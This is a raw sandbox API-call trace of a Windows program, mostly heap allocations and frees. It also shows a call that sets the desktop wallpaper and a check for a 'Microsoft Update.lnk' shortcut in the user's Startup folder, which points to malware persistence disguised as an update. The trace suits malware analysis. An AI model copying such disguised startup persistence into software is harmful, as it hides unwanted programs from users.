returned 1 [0285.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0285.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0285.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0285.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0285.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0285.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0285.309] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0285.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0285.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0285.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0285.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0285.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0285.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0285.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0285.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0285.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0285.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0285.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0285.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0285.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0285.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0285.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0285.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0285.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0285.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0285.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0285.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0285.311] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0285.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0285.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0285.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0285.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0285.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0285.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0285.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0285.312] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0285.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0285.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0285.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0285.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0285.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0285.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0285.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0285.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0285.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0285.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0285.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0285.313] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0285.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0285.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0285.440] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0285.440] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0285.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0285.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0285.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0285.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0285.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0285.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0285.441] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0285.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0285.441] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0285.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0285.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0285.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0285.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0285.442] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0285.442] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0285.443] FreeLibrary (hLibModule=0x74f40000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0285.443] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0285.444] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0285.445] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0285.445] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0285.445] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0285.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0285.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0285.446] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0285.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0285.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0285.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0285.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0285.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0285.446] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0285.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0285.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0285.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0285.446] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0285.447] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0285.448] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0285.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0285.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0285.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0285.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0285.449] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0285.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0285.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0285.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0285.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0285.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0285.459] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0285.459] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0285.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0285.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0285.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0285.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0285.460] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0285.460] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0285.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0285.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0285.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0285.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0285.461] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0285.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0285.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0285.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0285.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0285.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0285.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0285.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0285.461] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0285.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0285.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0285.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0285.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0285.462] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0285.462] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0285.463] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 